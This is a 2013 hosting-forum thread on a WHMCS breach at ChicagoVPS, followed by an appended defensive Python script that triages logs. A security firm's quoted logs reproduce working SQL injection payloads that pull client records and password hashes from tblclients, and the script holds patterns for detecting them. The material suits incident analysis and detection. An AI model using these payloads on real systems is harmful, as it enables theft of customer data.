
Global ChicagoVPS Password Reset?

Has ChicagoVPS issued a global password reset or am I the target of an individual hacking?


Comments

  • DalComp Member
    edited October 2013

    Mine is not reset, didn't get any email/update about the exploit either.

  • I got it too. It's most likely precautionary measure.

  • Oh fun.

    That's where mine came from, then. Any comment from @CVPS_Chris or @jbiloh?

  • Gunter Member
    edited October 2013

    @Jack said:
    Let's hope they didn't get done in that WHMCS exploit yesterday...

    Start conspiracy

    It's not like they have a stellar reputation. My theory on why they're the prime target for every hacking has nothing to do with scale or level of security.

    It's more so Chris has a tendency to voice everything in his head to the general public. Although he thinks it's good because he's practicing free speech, in reality, it's just putting all his customers at risk.

    But for the record, I'm not trying to ruin his reputation. Professionally, Chris has always responded to me with great courtesy. His actions on a message board have nothing to do with the level of service he provides with CVPS.

  • @darknyan said:
    Has ChicagoVPS issued a global password reset

    Nope.

  • akz Member

    I haven't gotten anything, but their WHMCS seems to be still down.

  • Maybe @CVPS_Chris is out #WINNING

  • @jimpop said:
    Nope.

    Can you say that with any amount of certainty?

    Because then it's even weirder why multiple customers are getting random password reset emails.

  • @ihatetonyy said:
    Can you say that with any amount of certainty?

    Yes I can. I'm a (happy) current CVPS customer (6 nodes from them) and my password was not reset.

  • @ihatetonyy said:

    Well, it's concerning if it's a randomized attack.

  • Jun Member

    My account is affected, too.
    Hope this is not anything going bad

  • AnthonySmith Member, Patron Provider

    Just saying.... it is possible only 1 set of customers was affected if it was a hack, e.g. 1 product group/category. Simple enough to select 1 table.

    Disclaimer, I genuinely hope they were not hacked. But for those that had a PW reset, perhaps compare what product you have.

  • I had the reset on a $12/year plan in Chicago.

  • Spirit Member
    edited October 2013

    I had the reset on a $12/year plan in NJ
    Another client I know with a $32/year plan at the same location got a pw reset too, so price isn't the pattern.

  • CVPS_Chris Member, Patron Provider

    Hey guys, making a post regarding what happened.

    Our logs indicate that an individual may have run the whmcs2.py script on our WHMCS install. One of our employees acted immediately when it came to our attention that there was a new WHMCS exploit available. After an evaluation of our logs, we have identified that about 3% of our customers were affected and we've gone ahead and issued a password reset to those customers to be on the safe side. The customers that were affected were legacy customers, meaning that a high percentage were inactive clients.

    We issued a partial password reset towards the 3% of customers that may have been affected by this WHMCS exploit. If you received a password reset email and you did not request one, you were possibly affected, and your password was reset for your safety. While passwords are encrypted, we do not want to take any chances when it comes to the security of our customers. The only information that possibly was accessed by a third party for the 3% of customers impacted were the following: clientid, name, address, email address, encrypted password. No VPS service details or credit card information was accessed in any way.

    We have already patched our WHMCS installation, and have adjusted our security settings to make it harder for exploits in general to be run. One of the measures we took to further enhance security was doing a complete overhaul on our modsecurity rules on the billing server.

    An email is currently going out to the clients that were affected explaining the situation.

    Regards

    Chris

  • How were only 3% of the people affected?

  • @CVPS_Chris said:
    The customers that were affected were legacy customers, meaning that high percentage were inactive clients.

    Hey Chris, can you clarify what you mean by 'Legacy customers'?

  • DomainBop Member
    edited October 2013

    @Spencer said:
    How were only 3% of the people affected?

    Yes, please explain how it is possible that hackers gained access to the database and only 3% of the customers listed in that database had their info compromised.

    the following: clientid, name, address, email address, encrypted password. No VPS service details or credit card information was accessed in any way.

    You claim that no credit card info was accessed and yet it appears that you are storing credit card info in the WHMCS database (on the credit card details tab the card type, card number, and card expiration date are all available). The WHMCS documentation also states that credit card info is stored in the WHMCS database when you use a merchant account.

    Merchant Gateways store credit card information securely in the WHMCS database

    http://docs.whmcs.com/Payment_Gateways

    You need to do more than just post the news that your billing portal was hacked on a forum. You also need to notify the NY State AG of the database breach (46 states have databreach notification laws so you may also have to notify other state AGs if you have customers in those states...here is a list of all state notification laws http://www.perkinscoie.com/statebreachchart/). You also need to notify your merchant account provider and/or Visa/Mastercard of the database breach.

    FYI, since this is the 2nd time in 4 months I have had my info compromised as a result of your poor security I will also be contacting the NY State AG and Visa and Mastercard this week to notify them of the breaches.

  • @DomainBop said:
    as a result of your poor security

    Do tell, please.

  • Lee Veteran
    edited October 2013

    @cvps_chris - You are full of shit my friend.

    Yet again CVPS screws up and tries to cover up.

  • Give the guy a break. It wasn't his fault. There were lots of hosts hit by this exploit. They don't even know that they got it. Just a simple search on pastebin.com reveals lots of customer information leaked by this last WHMCS exploit.

  • ricardo Member
    edited October 2013

    Can't fault the provider here, they've taken the necessary precautions and kudos for not just sweeping it under the carpet.

    IMHO, you can't blame a provider for using WHMCS, why reinvent the wheel? And if you do, please make it at least as good, if not better.

    The only sensible thing I can think of here to avoid further exploits, is that WHMCS pings a master server every few minutes, to receive notifications of any new exploits. If one exists, cease public access until an admin addresses the issue. Clients of WHMCS could have the option of having this active or not, but it seems sensible to have it on given the speed at which an exploit can be used.

    One of the largest shared hosting providers experienced a server level exploit recently, but in their emails to clients they only mentioned specific sites being compromised, when in fact hundreds of their clients had been compromised due to the server they were on. It's up to providers to not bullsh*t the customer.

  • CVPS actually did the right thing here.

    Not sure why everyone thinks it's their fault.

    Thanked by 1ihatetonyy
  • @mcmyhost said:
    Not sure why everyone thinks it's their fault.

    I think it's quite easy to see why a handful of guys think that way. Jealousy comes to mind.

  • gsrdgrdghd Member
    edited October 2013

    Can someone give any details on the timespan between the password reset mail and the mail explaining you that your data has been stolen?

  • The latest exploit requires looping through each record, using a new http request each time. 3% leak rate just means they turned it off during the process. The compromised records also end up being the first users in the system given how the userids are assigned.

  • Gunter Member
    edited October 2013

    @mcmyhost said:
    CVPS actually did the right thing here.

    Not sure why everyone thinks it's their fault.

    Because Chris has a tendency to piss people off, and that is justifiable motive to hack their WHMCS.

    Not to mention it took them an entire day to inform us, but it isn't necessarily their fault for this point.

    And unrelated but I don't think I'm a Legacy Customer.

  • @tchen said:
    The latest exploit requires looping through each record, using a new http request each time. 3% leak rate just means they turned it off during the process. The compromised records also end up being the first users in the system given how the userids are assigned.

    That is correct. We have extensive logging set up on our infrastructure and log all of the POST data. All logs are not logged on our own servers, they are sent in real time to an offsite datacenter. That is how we were able to determine exactly how many were affected, and we wrote a script to only reset and email the 3% impacted.

  • I got the password reset email.. on $12/y package..

  • laaev Member
    edited October 2013

    I wanted to share this here to expand more about the 3%. Below is what the security firm who set up our logging, helped us with modsecurity and so forth, had to say on that matter.

    "We set up logging for ChicagoVPS a couple of months ago, including writing a custom module for Apache that sends all POST data to our own log server. All kinds of logs are sent in real time, so that way we can go back and look at the logs if anything occurs."

    "This is what we got in the POST data right before the server was taken into maintenance mode. For example, if you install an unsecured WHMCS and run the exploit against yourself and log the POST data, this is exactly what you would see:

    "Location: POST /viewticket.php
    Client IP: 209.59.131.87:53212
    HTTPd Timestamp: 1382122285
    Content-Length: 256
    Content-Type: application/x-www-form-urlencoded
    Host: billing.chicagovps.net
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
    PostData: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT 386,1),0,0,0,0,0,0,0,0,0,0,0#"

    "Location: POST /viewticket.php
    Client IP: 209.59.131.87:53218
    HTTPd Timestamp: 1382122286
    Content-Length: 256
    Content-Type: application/x-www-form-urlencoded
    Host: billing.chicagovps.net
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
    PostData: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT 387,1),0,0,0,0,0,0,0,0,0,0,0#"

    "Location: POST /viewticket.php
    Client IP: 209.59.131.87:53225
    HTTPd Timestamp: 1382122287
    Content-Length: 256
    Content-Type: application/x-www-form-urlencoded
    Host: billing.chicagovps.net
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
    PostData: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT 388,1),0,0,0,0,0,0,0,0,0,0,0#"

    "So the last client obtained was the 388th person from the top of the table. So the exploit (whmcs2.py) as written doesn't do a full dump of the database all at once, but one user at a time. Since it only pulls one user at a time, by looking at the POST data - we can tell the last user that was pulled. Then all we had to do was to walk through the same users that were affected, put their IDs in a separate file, then do a mass password reset. I confirmed the exploit by running the exploit against the server and that it was in fact pulling data one by one."

    "Lucky for all of us, one of the employees found out about the exploit and put the database into maintenance mode and contacted us. I then proceeded to take the billing website fully offline in case the exploit still worked in maintenance mode, even though no data would be passed back. Afterwards, we went over and updated modsecurity rules so that tbladmins, tblclients and other tables cannot be specified in a POST. If you doubt this, try submitting a ticket using one of those key words (not giving you the full list here) - and see what happens. In addition to this, we identified the people who were affected and did a mass password reset."

    "Bottom line, always send your logs off to a remote server. And most exploits use http POST, so always log all the POST data. It's a good indication if somebody is trying to break in, or if they already did, to be able to assess how much damage they did and to find ways to update your security."

    "I understand that the latest rash of WHMCS and SolusVM exploits has rattled many people, and I join you in wondering what those programmers are doing with our hard-earned money while allowing other people to exploit our providers and end up affecting us as the customer. But do not confuse fact with fiction, as there are companies that are actually trying to improve and do better."

    Thanked by 1jimpop
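The triage the security firm describes above (and the per-row, one-request-per-record behaviour @tchen points out earlier in the thread) comes down to reading the POST-body log, picking out the injected requests, and recovering the LIMIT offset each one targeted. The script below is an added example written for this thread; it is not code from ChicagoVPS, from the security firm quoted, or from whmcs2.py. It assumes the blank-line-separated "Key: value" record format shown in the quoted log entries; the sample log embedded in it is constructed (the IPs, host, timestamps, offsets and the shortened payload are made up), the two-of-three marker rule for flagging a request and the `affected_client_ids` helper are this example's own choices, and the row order used at the end is a stand-in for whatever `SELECT id FROM tblclients` returns on a real install.

```python
"""Triage of POST-body logs after a WHMCS-style SQL injection (added example)."""
import re
from urllib.parse import unquote_plus

# Constructed sample log: same field names as the entries quoted in the thread,
# but IPs, host, timestamps, offsets and the (shortened) payload are made up.
# The second record is URL-encoded the way a real form body arrives on the wire.
SAMPLE_LOG = """\
Location: POST /viewticket.php
Client IP: 198.51.100.23:40001
HTTPd Timestamp: 1382122285
Content-Type: application/x-www-form-urlencoded
Host: billing.example.net
PostData: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,(SELECT CONCAT(id,0x3a,email) FROM tblclients LIMIT 386,1),0#

Location: POST /viewticket.php
Client IP: 198.51.100.23:40002
HTTPd Timestamp: 1382122286
Content-Type: application/x-www-form-urlencoded
Host: billing.example.net
PostData: tid%5Bsqltype%5D=TABLEJOIN&tid%5Bvalue%5D=-1+union+select+1%2C0%2C%28SELECT+CONCAT%28id%2C0x3a%2Cemail%29+FROM+tblclients+LIMIT+387%2C1%29%2C0%23

Location: POST /submitticket.php
Client IP: 203.0.113.9:51000
HTTPd Timestamp: 1382122290
Content-Type: application/x-www-form-urlencoded
Host: billing.example.net
PostData: subject=Hello&message=My+VPS+is+down
"""

# Markers of the injection shape seen in the thread; all WHMCS tables are tbl*-prefixed.
INJECTION_PATTERNS = [
    re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    re.compile(r"\bfrom\s+tbl\w+", re.I),
    re.compile(r"\[sqltype\]", re.I),   # array-key form field abused by this exploit
]
LIMIT_RE = re.compile(r"\bLIMIT\s+(\d+)\s*,\s*\d+", re.I)


def parse_records(text):
    """Split the log into blank-line-separated records of 'Key: value' lines."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def is_injection(post_body):
    """Flag a request when its decoded body carries at least two of the markers
    (two-of-three is this example's choice, to avoid flagging a ticket that
    merely mentions 'union select' in its text)."""
    decoded = unquote_plus(post_body)
    return sum(1 for p in INJECTION_PATTERNS if p.search(decoded)) >= 2


def limit_offset(post_body):
    """Return the LIMIT offset the injected sub-select targeted, or None."""
    m = LIMIT_RE.search(unquote_plus(post_body))
    return int(m.group(1)) if m else None


def triage(text):
    """Summarise which requests were injections and which table rows they read."""
    injected, benign, ips, offsets = 0, 0, set(), set()
    for rec in parse_records(text):
        body = rec.get("PostData", "")
        if not is_injection(body):
            benign += 1
            continue
        injected += 1
        ips.add(rec.get("Client IP", "?").rsplit(":", 1)[0])  # drop the source port
        off = limit_offset(body)
        if off is not None:
            offsets.add(off)
    ordered = sorted(offsets)
    return {
        "injection_requests": injected,
        "benign_requests": benign,
        "source_ips": ips,
        "offsets": ordered,
        # MySQL LIMIT offsets are zero-based: offset N is the (N+1)-th row in the
        # order the injected SELECT happened to return (it carried no ORDER BY).
        "highest_offset": ordered[-1] if ordered else None,
    }


def affected_client_ids(offsets, row_order):
    """Map offsets to client ids. row_order must list tblclients ids in the order
    the un-injected SELECT returns them; offsets past the end of the table are
    skipped because those requests returned no row."""
    return [row_order[o] for o in offsets if 0 <= o < len(row_order)]


if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    print(summary)
    demo_rows = list(range(1000, 1400))   # constructed stand-in for the table's row order
    print("reset these client ids:", affected_client_ids(summary["offsets"], demo_rows))
```

Run as-is it reports two injected requests from one source address, offsets 386 and 387, and maps them to the constructed ids 1386 and 1387. Because the injected query has no ORDER BY, the offset-to-id mapping is only trustworthy if `row_order` is produced by the same SELECT on the same table at the time of the reset, which is why the helper takes it as input rather than assuming ids are contiguous.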